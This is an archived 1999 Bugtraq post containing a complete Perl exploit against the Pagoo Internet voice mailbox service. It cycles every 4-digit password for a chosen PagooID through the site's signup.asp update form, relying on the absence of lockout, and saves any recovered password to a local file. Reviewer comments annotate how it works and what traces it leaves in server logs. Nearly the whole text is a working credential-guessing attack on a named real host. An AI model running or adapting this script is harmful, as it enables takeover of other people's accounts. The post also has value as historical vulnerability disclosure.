[10882] in bugtraq
hhp: Pagoo VMB remote exploit.
daemon@ATHENA.MIT.EDU (Elaich Of Hhp)
Wed Jun 23 13:39:06 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9906221304370.64-100000@ns.suspend.net>
Date: Tue, 22 Jun 1999 13:06:05 -0400
Reply-To: hhp@NS.SUSPEND.NET
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
To: BUGTRAQ@NETSPACE.ORG
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: elaich of the hhp.
# http://hhp.hemp.net/
# '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password for
# the PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing prevents a client from reconnecting
# and trying a new password, from 0000 in
# increments of 1 up to 9999, which is the
# highest password possible: failed attempts
# are neither limited nor locked out. I could
# call this a brute, but because the whole
# keyspace is only 10,000 values it is an
# exhaustive search that always gets the
# passwd, unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
# Setup: read the single command-line argument, open the result log and
# fix the target host. The file has no `use strict` / `use warnings`, so
# every variable here ($box, $host) is a package global shared with parse().
# Exactly one argument (the PagooID) is required.
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
# $box is later interpolated into the request URL in parse() without any
# validation or encoding.
($box) = (@ARGV);
# Append-mode log in the current working directory. A hit is written to it
# in plaintext, so a file named "pagooids" is a host-side artifact of this
# script having been run.
# NOTE(review): the die text names ".pagoo", not the file actually opened.
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
# Turn on autoflush for the log handle (indirect-object call of autoflush).
autoflush OUT 1;
# The target host is hard-coded.
$host = "www.pagoo.com";
autoflush STDOUT 1;
# parse(CANDIDATE): send one UpdateForm request carrying the PagooID and one
# candidate password, then scan the response for two marker strings.
# On a match it writes the result to STDOUT and the OUT log and exits the
# script; otherwise it returns once the response has been read to the end.
sub parse
{
# No `my`: this assigns the package global $num, the same variable the
# top-level loop increments.
($num) = @_;
# Both the PagooID and the candidate password travel in the query string of
# a GET, interpolated without encoding.
# NOTE(review): query strings are typically kept in web-server and proxy
# access logs, so a run of requests for this path with one PagooID and a
# changing Password value is the server-side trace to look for.
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
# A new TCP connection to port 80 (cleartext HTTP) is opened for every
# attempt; the script dies if the connect fails. The socket is never closed
# explicitly in this sub.
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
# Bare request line: no HTTP version and no headers are sent.
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
# Read the response one line at a time into $_.
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
# NOTE(review): `break` is not a Perl loop-control statement; without
# strict it is presumably a bareword no-op, so reading continues - confirm.
break;
}
# The text "First Name" is treated as proof of a correct password
# (presumably a field of the account update form - confirm).
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
# The recovered credential is appended in plaintext to the OUT log.
print OUT "PagooID: $box / Password: $num\n";
# The first hit ends the whole script.
exit 0;
}
}
}
# Driver: walk the candidate passwords in order, one parse() call each,
# with no delay between calls. Seen from the server this is a long run of
# back-to-back requests for one PagooID from one client; a per-account
# limit on failed attempts would end it after a handful of tries.
$num = '0000';
parse $num;
# NOTE(review): $num is presumably advanced by Perl's string increment, which
# would keep the zero padding ('0000' -> '0001') - confirm.
# NOTE(review): the loop body runs 10,000 times after the initial call above,
# so the final candidate sent lies one past 9999, outside the 4-digit range
# the header describes.
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}